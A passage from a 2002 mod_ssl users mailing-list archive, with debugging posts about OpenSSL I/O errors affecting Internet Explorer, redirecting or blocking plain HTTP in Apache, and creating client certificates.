| 0080: d1 87 36 8b b4 73 5f 24-d8 63 f9 a5 a3 dd 28 38  ..6..s_$.c....(8 |
| 0090: 75 54 0c c7 28 7b c1 ba-fe c9 21 d6 dd ce 8d ed  uT..({....!..... |
| 00a0: fb 6c ab cd 76 de dc 64-b4 9a 02 ea 2f f4 c1 4a  .l..v..d..../..J |
| 00b0: a0 64 88 af b3 b8 cb 18-42 9f cb 38 8f 37 a0 43  .d......B..8.7.C |
| 00c0: 43 f6 eb bc 6f 4e bd 7c-63 fc 11 4a f4 a3 1e 56  C...oN.|c..J...V |
| 00d0: 2d 54 2e fc 32 da 93 77-de 0a 74 6f be 73 06 2d  -T..2..w..to.s.- |
| 00e0: 9d 9a 8f 9f b6 ff 80 33-24 c0 af 47 d2 37 af e6  .......3$..G.7.. |
| 00f0: 8c 7d a6 89 0a 1f 65 ca-d8 12 c6 7a e7 0b 30 74  .}....e....z..0t |
| 0100: f2 30 c9 df be 15 79 80-de f2 33 8c 4f ba fc 2f  .0....y...3.O../ |
| 0110: 30 96 d9 f4 ac 39 f5 8a-43 f6 0a 16 71 db ee 5d  0....9..C...q..] |
| 0120: 31 a7 31 d6 95 99 c0 b8-83 90 4d 09 da 65 91 77  1.1.......M..e.w |
| 0130: f6 aa ea 0c a2 c5 2a a0-a4 e7 95 52 85 53 4a b0  ......*....R.SJ. |
| 0140: 3f 27 b1 f3 90 7d cd 6f-ca ec de 49 4e c8 9f 6e  ?'...}.o...IN..n |
| 0150: ee 84 ae 9e a1 a0 ab 26-88 f8 e3 ee 12 e0 68 d3  .......&......h. |
| 0160: 27 a0 33 13 8e be 4d 45-8d 96 14 2b f9 3f 76 8b  '.3...ME...+.?v. |
| 0170: 8e 1b 06 bb 02 54 8a 29-99 e8 29 bd 68 13 41 c0  .....T.)..).h.A. |
| 0180: 49 0c e0 81 a9 19 45 3d-00 96 21 4c d6 08 74 43  I.....E=..!L..tC |
| 0190: ca 1d 3d 87 cd 1d 1a 5a-c1 33 cc 03 a6 4a 82 fd  ..=....Z.3...J.. |
| 01a0: a4 43 13 54 8a 94 45 eb-d1 5d 9e 14 b8 3f 6b 27  .C.T..E..]...?k' |
| 01b0: 67 74 c4 53 ba 55 8e ff-01 3c d1 af f2 d5 16 31  gt.S.U...<.....1 |
| 01c0: b8 69 e8 d5 ac d3 a1 3f-18 4a 51 68 d0 d8 8e 99  .i.....?.JQh.... |
| 01d0: 60 ab f9 24 12 18 d0 de-2c 0c 50 9f 91 d8 01 9b  `..$....,.P..... |
| 01e0: 8e 4a f8 c7 12 ba 30 f9-11 96 0f 35 4f a7 26 84  .J....0....5O.&. |
| 01f0: a6 c7 90 ff b4 17 ff 1f-be 71 b9 85 61 c3 60 85  .........q..a.`. |
| 0200: 7b 20 e9 31 d9 2e b5 d6-0b eb 01 4a d8 4e 22 24  { .1.......J.N"$ |
| 0210: 59 09 49 6b 1a 5d f3 23-80 4e b6 4a 7f 46 6d 8a  Y.Ik.].#.N.J.Fm. |
| 0220: 8f 85 2b ef 4b cf db a6-89 52 72 c8 2b 74 ac 79  ..+.K....Rr.+t.y |
| 0230: 8f 5e 4a 9b 72 ea fc a4-f6 85 9b b4 6a 16 c3 d8  .^J.r.......j... |
| 0240: 1f 07 b8 aa ce 15 33 cb-7c fe de e3 9f 02 15 5c  ......3.|......\ |
| 0250: 91 3a bc 1b a7 79 f1 5e-eb b9 63 12 9d 29 21 5c  .:...y.^..c..)!\ |
| 0260: bb 3d 88 58 c9 56 19 41-2b 0d 88 09 df 2d 40 e7  .=.X.V.A+....-@. |
| 0270: ef e9 23 4b 93 d9 b0 f7-bb e7 c6 f4 df 93 db 96  ..#K............ |
| 0280: 2a 00 cc ee da aa 4e dd-6c d4 36 d3 ec d4 ac c1  *.....N.l.6..... |
| 0290: fa ba cb 06 71 60 6f 1b-11 ea 90 e7 d0 89 38 53  ....q`o.......8S |
| 02a0: dc 7c 36 0e a1 ee 43 21-bb 23 f0 50 12 41 db a5  .|6...C!.#.P.A.. |
| 02b0: e2 d5 86 1d 89 0b 33 e2-6f 60 4f 17 52 9a c3 d2  ......3.o`O.R... |
| 02c0: e2 3d 80 c9 a7 b2 a4 ba-40 39 60 86 a4 e6 b5 e3  .=......@9`..... |
| 02d0: 08 2a 38 54 51 8d 80 a7-f0 8c f5 c6 b1 1d 5f e6  .*8TQ........._. |
| 02e0: d8 ad 33 d1 c3 8a 8d c9-ed 35 d6 51 fd 7f a2 5a  ..3......5.Q...Z |
| 02f0: a8 5b d3 1f 84 94 31 16-0a d9 6a 7c 82 2b c7 32  .[....1...j|.+.2 |
| 0300: 9b 9c 1b 9b 4a 01 f1 ce-c9 36 aa 04 91 b9 12 77  ....J....6.....w |
| 0310: 0d 64 77 07 6e c3 ee 02-e2 c5 11 73 a8 66 5c 92  .dw.n......s.f\. |
| 0320: de 41 1c fa 5e 57 b3 d0-f0 92 e5 2f 4a           .A..^W...../J    |
+-------------------------------------------------------------------------+
[10/Jun/2002 15:43:06 35008] [info]  Subsequent (No.2) HTTPS request received
for child 9 (server card.omv.com:443)
[10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 18437 bytes expected to
read on BIO#202FF4B8 [mem: 2045B828]
[10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 20464038]
[10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 20464038]
[10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 20464038]
[10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 20464038]
[10/Jun/2002 15:43:06 21760] [info]  Connection to child 1 closed with standard
shutdown (server card.omv.com:443, client 10.2.140.73)
[10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 18437 bytes expected to
read on BIO#202FF4B8 [mem: 204557C8]
[10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 2045DFD8]
[10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 2045DFD8]
[10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 2045DFD8]
[10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
write on BIO#202FF4B8 [mem: 2045DFD8]
[10/Jun/2002 15:43:06 28934] [info]  Connection to child 8 closed with standard
shutdown (server card.omv.com:443, client 10.2.140.73)
[10/Jun/2002 15:43:06 35008] [debug] OpenSSL: write 360/360 bytes to
BIO#202FF4B8 [mem: 2045DFD8] (BIO dump follows)
+-------------------------------------------------------------------------+
|

We are using PL/SQL Server Pages (PSP) containing javascript and html code.
Running the application without SSL does NOT cause errors!
Are there any settings in the httpd.conf file for using IE and PSPs?

Thanx in advance for your help!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 13 17:40:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA02699; Thu, 13 Jun 2002 17:37:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail4.nc.rr.com id RAA02655; Thu, 13 Jun 2002 17:36:07 +0200 (MET DST)
Received: from mail pickup service by mail4.nc.rr.com with Microsoft SMTPSVC;
	 Thu, 13 Jun 2002 11:16:54 -0400
Received: from mail pickup service by mail4.nc.rr.com with Microsoft SMTPSVC;
	 Wed, 12 Jun 2002 04:06:19 -0400
Received: from ncmx01.mgw.rr.com ([24.93.67.251]) by mail4.nc.rr.com  with Microsoft SMTPSVC(5.5.1877.757.75);
	 Mon, 10 Jun 2002 15:00:53 -0400
Received: from mmx.engelschall.com (mmx.engelschall.com [195.27.130.252])
	by ncmx01.mgw.rr.com (8.12.2/8.12.2) with ESMTP id g5AJ0qtH024431
	for ; Mon, 10 Jun 2002 15:00:52 -0400 (EDT)
Received: by mmx.engelschall.com (Postfix)
	id B6CE7194DE; Mon, 10 Jun 2002 21:00:18 +0200 (CEST)
Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153])
	by mmx.engelschall.com (Postfix) with ESMTP id 623F119345
	for ; Mon, 10 Jun 2002 21:00:18 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA03588; Mon, 10 Jun 2002 20:59:41 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from server.cartmanager.net id UAA03549; Mon, 10 Jun 2002 20:58:29 +0200 (MET DST)
Received: from Jason (dhcp120.cartmanager.net [207.173.85.120])
	(authenticated)
	by server.cartmanager.net (8.11.6/8.11.6) with ESMTP id g5AImUQ26095
	for ; Mon, 10 Jun 2002 12:48:30 -0600
Message-ID: <02d601c210b0$cd218610$7855adcf@Jason>
From: "Jason" 
To: 
References: <200206101424.QAA15580@opensource.ee.ethz.ch>
Subject: Re: [BugDB] I/O Error when using https (PR#715)
Date: Mon, 10 Jun 2002 12:54:41 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
X-Sender: "Jason" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jason" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Have you tried adding this in your httpd.conf
SetEnvIf User-Agent ".*MSIE.*"  "nokeepalive" "ssl-unclean-shutdown" "downgrade-1.0" "force-response-1.0"

It may prevent (but not correct) your problem with IE

----- Original Message ----- 
From: 
To: 
Cc: 
Sent: Monday, June 10, 2002 8:24 AM
Subject: [BugDB] I/O Error when using https (PR#715)


> Full_Name: Stephan PAVEK, Mag.
> Version: 2.8.1
> OS: Win NT 40
> Submission from: (NULL) (193.83.101.90)
> 
> 
> We are running a web-application using SSL. The environment is as follows: IAS
> 1.0.2.2.2 (ORACLE) using Apache (v 1.3.19) and open_ssl (v 0.9.5a) on an
> AIX-Machine, ORACLE-DB v. 8.1.7.3.
> Using IE Explore > 5.01 (we didn't test older versions) we get I/O errors in the
> log-file (ssl_engine_log). We got the following log-entries. These error result
> in empty pages on the Browser (
> 
> +-------------------------------------------------------------------------+
> [10/Jun/2002 15:43:06 35008] [debug] OpenSSL: read 813/18437 bytes from
> BIO#202FF4B8 [mem: 204557C8] (BIO dump follows)
> +-------------------------------------------------------------------------+
> | 0000: 17 03 01 03 28 8a f8 91-2e 50 78 b0 02 4e 23 68  ....(....Px..N#h |
> | 0010: 53 95 8f 7d d4 55 24 ab-e4 66 88 59 6f 78 05 d5  S..}.U$..f.Yox.. |
> | 0020: 50 01 e2 96 ac 8c 8f 08-5e 68 12 9b 27 68 22 75  P.......^h..'h"u |
> | 0030: 24 80 cc 2a 13 82 eb 4b-01 82 93 78 45 c3 66 1c  $..*...K...xE.f. |
> | 0040: 22 fa 3f a1 9a 78 1c a7-ce 66 98 ab f0 4b e9 38  ".?..x...f...K.8 |
> | 0050: 88 03 ce 16 12 33 6a 74-e2 8a df 5e d5 3f 98 58  .....3jt...^.?.X |
> | 0060: 80 d5 5a ba ab bf 2e 3e-53 7c 14 60 4e b8 a0 03  ..Z....>S|.`N... |
> | 0070: 9d 62 fc 5f 1d fc ca c7-5e ac 53 b7 46 e5 6f 8c  .b._....^.S.F.o. |
> | 0080: d1 87 36 8b b4 73 5f 24-d8 63 f9 a5 a3 dd 28 38  ..6..s_$.c....(8 |
> | 0090: 75 54 0c c7 28 7b c1 ba-fe c9 21 d6 dd ce 8d ed  uT..({....!..... |
> | 00a0: fb 6c ab cd 76 de dc 64-b4 9a 02 ea 2f f4 c1 4a  .l..v..d..../..J |
> | 00b0: a0 64 88 af b3 b8 cb 18-42 9f cb 38 8f 37 a0 43  .d......B..8.7.C |
> | 00c0: 43 f6 eb bc 6f 4e bd 7c-63 fc 11 4a f4 a3 1e 56  C...oN.|c..J...V |
> | 00d0: 2d 54 2e fc 32 da 93 77-de 0a 74 6f be 73 06 2d  -T..2..w..to.s.- |
> | 00e0: 9d 9a 8f 9f b6 ff 80 33-24 c0 af 47 d2 37 af e6  .......3$..G.7.. |
> | 00f0: 8c 7d a6 89 0a 1f 65 ca-d8 12 c6 7a e7 0b 30 74  .}....e....z..0t |
> | 0100: f2 30 c9 df be 15 79 80-de f2 33 8c 4f ba fc 2f  .0....y...3.O../ |
> | 0110: 30 96 d9 f4 ac 39 f5 8a-43 f6 0a 16 71 db ee 5d  0....9..C...q..] |
> | 0120: 31 a7 31 d6 95 99 c0 b8-83 90 4d 09 da 65 91 77  1.1.......M..e.w |
> | 0130: f6 aa ea 0c a2 c5 2a a0-a4 e7 95 52 85 53 4a b0  ......*....R.SJ. |
> | 0140: 3f 27 b1 f3 90 7d cd 6f-ca ec de 49 4e c8 9f 6e  ?'...}.o...IN..n |
> | 0150: ee 84 ae 9e a1 a0 ab 26-88 f8 e3 ee 12 e0 68 d3  .......&......h. |
> | 0160: 27 a0 33 13 8e be 4d 45-8d 96 14 2b f9 3f 76 8b  '.3...ME...+.?v. |
> | 0170: 8e 1b 06 bb 02 54 8a 29-99 e8 29 bd 68 13 41 c0  .....T.)..).h.A. |
> | 0180: 49 0c e0 81 a9 19 45 3d-00 96 21 4c d6 08 74 43  I.....E=..!L..tC |
> | 0190: ca 1d 3d 87 cd 1d 1a 5a-c1 33 cc 03 a6 4a 82 fd  ..=....Z.3...J.. |
> | 01a0: a4 43 13 54 8a 94 45 eb-d1 5d 9e 14 b8 3f 6b 27  .C.T..E..]...?k' |
> | 01b0: 67 74 c4 53 ba 55 8e ff-01 3c d1 af f2 d5 16 31  gt.S.U...<.....1 |
> | 01c0: b8 69 e8 d5 ac d3 a1 3f-18 4a 51 68 d0 d8 8e 99  .i.....?.JQh.... |
> | 01d0: 60 ab f9 24 12 18 d0 de-2c 0c 50 9f 91 d8 01 9b  `..$....,.P..... |
> | 01e0: 8e 4a f8 c7 12 ba 30 f9-11 96 0f 35 4f a7 26 84  .J....0....5O.&. |
> | 01f0: a6 c7 90 ff b4 17 ff 1f-be 71 b9 85 61 c3 60 85  .........q..a.`. |
> | 0200: 7b 20 e9 31 d9 2e b5 d6-0b eb 01 4a d8 4e 22 24  { .1.......J.N"$ |
> | 0210: 59 09 49 6b 1a 5d f3 23-80 4e b6 4a 7f 46 6d 8a  Y.Ik.].#.N.J.Fm. |
> | 0220: 8f 85 2b ef 4b cf db a6-89 52 72 c8 2b 74 ac 79  ..+.K....Rr.+t.y |
> | 0230: 8f 5e 4a 9b 72 ea fc a4-f6 85 9b b4 6a 16 c3 d8  .^J.r.......j... |
> | 0240: 1f 07 b8 aa ce 15 33 cb-7c fe de e3 9f 02 15 5c  ......3.|......\ |
> | 0250: 91 3a bc 1b a7 79 f1 5e-eb b9 63 12 9d 29 21 5c  .:...y.^..c..)!\ |
> | 0260: bb 3d 88 58 c9 56 19 41-2b 0d 88 09 df 2d 40 e7  .=.X.V.A+....-@. |
> | 0270: ef e9 23 4b 93 d9 b0 f7-bb e7 c6 f4 df 93 db 96  ..#K............ |
> | 0280: 2a 00 cc ee da aa 4e dd-6c d4 36 d3 ec d4 ac c1  *.....N.l.6..... |
> | 0290: fa ba cb 06 71 60 6f 1b-11 ea 90 e7 d0 89 38 53  ....q`o.......8S |
> | 02a0: dc 7c 36 0e a1 ee 43 21-bb 23 f0 50 12 41 db a5  .|6...C!.#.P.A.. |
> | 02b0: e2 d5 86 1d 89 0b 33 e2-6f 60 4f 17 52 9a c3 d2  ......3.o`O.R... |
> | 02c0: e2 3d 80 c9 a7 b2 a4 ba-40 39 60 86 a4 e6 b5 e3  .=......@9`..... |
> | 02d0: 08 2a 38 54 51 8d 80 a7-f0 8c f5 c6 b1 1d 5f e6  .*8TQ........._. |
> | 02e0: d8 ad 33 d1 c3 8a 8d c9-ed 35 d6 51 fd 7f a2 5a  ..3......5.Q...Z |
> | 02f0: a8 5b d3 1f 84 94 31 16-0a d9 6a 7c 82 2b c7 32  .[....1...j|.+.2 |
> | 0300: 9b 9c 1b 9b 4a 01 f1 ce-c9 36 aa 04 91 b9 12 77  ....J....6.....w |
> | 0310: 0d 64 77 07 6e c3 ee 02-e2 c5 11 73 a8 66 5c 92  .dw.n......s.f\. |
> | 0320: de 41 1c fa 5e 57 b3 d0-f0 92 e5 2f 4a           .A..^W...../J    |
> +-------------------------------------------------------------------------+
> [10/Jun/2002 15:43:06 35008] [info]  Subsequent (No.2) HTTPS request received
> for child 9 (server card.omv.com:443)
> [10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 18437 bytes expected to
> read on BIO#202FF4B8 [mem: 2045B828]
> [10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
> write on BIO#202FF4B8 [mem: 20464038]
> [10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
> write on BIO#202FF4B8 [mem: 20464038]
> [10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
> write on BIO#202FF4B8 [mem: 20464038]
> [10/Jun/2002 15:43:06 21760] [debug] OpenSSL: I/O error, 23 bytes expected to
> write on BIO#202FF4B8 [mem: 20464038]
> [10/Jun/2002 15:43:06 21760] [info]  Connection to child 1 closed with standard
> shutdown (server card.omv.com:443, client 10.2.140.73)
> [10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 18437 bytes expected to
> read on BIO#202FF4B8 [mem: 204557C8]
> [10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
> write on BIO#202FF4B8 [mem: 2045DFD8]
> [10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
> write on BIO#202FF4B8 [mem: 2045DFD8]
> [10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
> write on BIO#202FF4B8 [mem: 2045DFD8]
> [10/Jun/2002 15:43:06 28934] [debug] OpenSSL: I/O error, 23 bytes expected to
> write on BIO#202FF4B8 [mem: 2045DFD8]
> [10/Jun/2002 15:43:06 28934] [info]  Connection to child 8 closed with standard
> shutdown (server card.omv.com:443, client 10.2.140.73)
> [10/Jun/2002 15:43:06 35008] [debug] OpenSSL: write 360/360 bytes to
> BIO#202FF4B8 [mem: 2045DFD8] (BIO dump follows)
> +-------------------------------------------------------------------------+
> |
> 
> We are using PL/SQL Server Pages (PSP) containing javascript and html code.
> Running the application without SSL does NOT cause errors!
> Are there any settings in the httpd.conf file for using IE and PSPs?
> 
> Thanx in advance for your help!
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 13 18:00:15 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA03719; Thu, 13 Jun 2002 17:59:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail4.nc.rr.com id RAA03715; Thu, 13 Jun 2002 17:59:04 +0200 (MET DST)
Received: from mail pickup service by mail4.nc.rr.com with Microsoft SMTPSVC;
	 Thu, 13 Jun 2002 11:27:31 -0400
Received: from ncmx01.mgw.rr.com ([24.93.67.251]) by mail4.nc.rr.com  with Microsoft SMTPSVC(5.5.1877.757.75);
	 Tue, 11 Jun 2002 09:38:34 -0400
Received: from mmx.engelschall.com (mmx.engelschall.com [195.27.130.252])
	by ncmx01.mgw.rr.com (8.12.2/8.12.2) with ESMTP id g5BCRa3o011379
	for ; Tue, 11 Jun 2002 08:27:36 -0400 (EDT)
Received: by mmx.engelschall.com (Postfix)
	id D6FE019373; Tue, 11 Jun 2002 14:27:04 +0200 (CEST)
Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153])
	by mmx.engelschall.com (Postfix) with ESMTP id 8FD0C19332
	for ; Tue, 11 Jun 2002 14:27:04 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA29113; Tue, 11 Jun 2002 14:26:07 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from darkstar.sysinfo.com id OAA29108; Tue, 11 Jun 2002 14:26:01 +0200 (MET DST)
Received: from localhost (dufresne@localhost)
	by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id IAA04285;
	Tue, 11 Jun 2002 08:26:14 -0400
Date: Tue, 11 Jun 2002 08:26:13 -0400 (EDT)
From: "R. DuFresne" 
To: Dale Weaver 
Cc: modssl-users@modssl.org
Subject: RE: How to disable part of the HTTP pages?
In-Reply-To: 
Message-ID: 
Organization: sysinfo.com
X-Subliminal: If at first you don't suck seed...
X-Admonition: The Good thing about potential is
X-Admonition2: as long as you do nothing
X-Admonition3: you'll always have it.
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "R. DuFresne" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


This might depend upon what the site wants to do in the end.  Disabling
port 80 will help keep folks from popping in on http, it can be a bennie
for sites open only to a chosen few.  Redirects are good for sites open to
all and pushing clients to the https aspect.  So, it can depend upon what
the sites requirements are.

Thanks,

Ron DuFresne

On Tue, 11 Jun 2002, Dale Weaver wrote:

> 
> I believe it is more accurate to redirect.  It causes less 
> confusion:
> 
> 
> ServerName  whatever
> Redirect  permanent / https://whatever
> 
> 
> Avoids confusion and irritation on the part of site visitors.
> 
> ---------------------------------------------------------------------
> 
> When a true genius appears in the world, you may know him by
> this sign; that the dunces are all in confederacy against him. 
>     -- Jonathan Swift 
> ___
> 
> Dale Weaver                               dale@mail.wake.tec.nc.us
> UNIX Systems Administrator                (919) 662-3508	
> Wake Technical Community College          fax (919) 779-3360
> 
> On Sun, 9 Jun 2002, Han,Donghoon wrote:
> 
> > Put "Deny from all" in  
> > in the vhost settings where the serving port is 80.
> > 
> > Ex)
> > 
> > BlahBlahBlah
> > 
> > 	Order Deny,Allow
> > 	Deny from all
> > 
> > 
> > 
> > 
> > BlahBlah
> > 
> > 	Order Allow,Deny
> > 	Allow from all
> > 
> > 
> > 
> > Refer to the apache manual for further information.
> > 
> > -----Original Message-----
> > From: owner-modssl-users@modssl.org
> > [mailto:owner-modssl-users@modssl.org] On Behalf Of lin geng
> > Sent: Saturday, June 08, 2002 10:44 AM
> > To: modssl-users@modssl.org
> > Subject: RE: How to disable part of the HTTP pages?
> > 
> > Disable port 80.
> > 
> > -----Original Message-----
> > From: owner-modssl-users@modssl.org
> > [mailto:owner-modssl-users@modssl.org]On Behalf Of Conrad Ng
> > Sent: Wednesday, June 05, 2002 8:47 PM
> > To: modssl-users@modssl.org
> > Subject: How to disable part of the HTTP pages?
> > 
> > 
> > Dear all
> > 
> > After I have implemented the SSL technology in my servers, I understand
> > that
> > users can access securely under HTTPS://. However, they can still
> > access through HTTP://. Is there any way to block people from
> > accessing under HTTP:// ? I'm not meaning to block the whole port 80 but
> > only some pages, is it belong to the settings of Apache or what? Please
> > instruct. Thanks a lot!!
> > 
> > Regards
> > 
> > Conrad Ng
> > 
> > 
> > ______________________________________________________
> > 
> > Scott Wilson Ltd celebrates its new name during its 50th year in Hong
> > Kong!
> > 
> > This e-mail and any attachments to it are intended only for the party to
> > whom they are addressed. They may contain privileged and/or confidential
> > information. If you have received this transmission in error please
> > notify
> > the sender immediately and delete any digital copies and destroy any
> > paper
> > copies. Thank you.
> > 
> > Scott Wilson accepts no contractual liabilities or commitments arising
> > from
> > this e-mail unless subsequently confirmed by fax or letter or as an
> > e-mail
> > attachment giving company name, address, registration number and
> > authorized
> > signatory.
> > ______________________________________________________
> > 
> > 
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> > 
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> > 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

-- 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
        admin & senior security consultant:  sysinfo.com
                        http://sysinfo.com

"Cutting the space budget really restores my faith in humanity.  It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation."
                -- Johnny Hart

testing, only testing, and damn good at it too!

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 13 18:01:35 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA03826; Thu, 13 Jun 2002 18:00:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from s5.smtp.oleane.net id RAA03745; Thu, 13 Jun 2002 17:59:51 +0200 (MET DST)
Received: from fbi-routeur.meeschaert.com (gw-meeschaert.meeschaert.com [62.160.237.1])
	by s5.smtp.oleane.net (8.12.0/8.12.0.Beta14/8.12-FT) with SMTP id g5DFxjWZ062343
	for ; Thu, 13 Jun 2002 17:59:51 +0200 (CEST)
Received: from vagmestre.meeschaert.com by fbi-routeur.meeschaert.com
          via smtpd (for s5.smtp.oleane.net [195.25.12.15]) with SMTP; 13 Jun 2002 15:53:02 UT
Received: (private information removed)
Received: (private information removed)
From: "Antoine de Lobel-Mahy" 
To: 
Subject: client certificate!
Date: Thu, 13 Jun 2002 17:59:33 +0200
Message-ID: <074601c212f3$4ff0f6e0$2f1510ac@meeschaert.com>
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook CWS, Build 9.0.2416 (9.0.2910.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
In-Reply-To: <02d601c210b0$cd218610$7855adcf@Jason>
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id SAA03768
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Antoine de Lobel-Mahy" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello everybody.

In first, sorry for my english.

I have web server with apache, modèssl and openssl.

I need to create certificate for my user's company,
can I do it with this software?

Currently, I know how to create 
server's certificate, but what about client?

thanks.

Antoine

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 13 18:09:23 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id SAA04673; Thu, 13 Jun 2002 18:08:43 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sitesontesting.com id SAA04523; Thu, 13 Jun 2002 18:08:11 +0200 (MET DST)
Message-Id: <200206131608.SAA04523@opensource.ee.ethz.ch>
Received: from WorldClient [127.0.0.1]
	by sitesontesting.com [127.0.0.1]
	with SMTP (MDaemon.PRO.v5.0.5.R)
	for ; Thu, 13 Jun 2002 21:41:38 +0530
Date: Thu, 13 Jun 2002 21:41:06 +0530
From: "Prachait Saxena" 
To: , ,
        
Subject: Apache/2.0.36 + Win98 + SSL or PHP4=Error(31)
X-Mailer: WorldClient 5.0.5
X-MDRemoteIP: 127.0.0.1
X-Return-Path: subscription@sitesontesting.com
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Prachait Saxena" 
X-List-Manager: Majordomo [version 1.94.4]
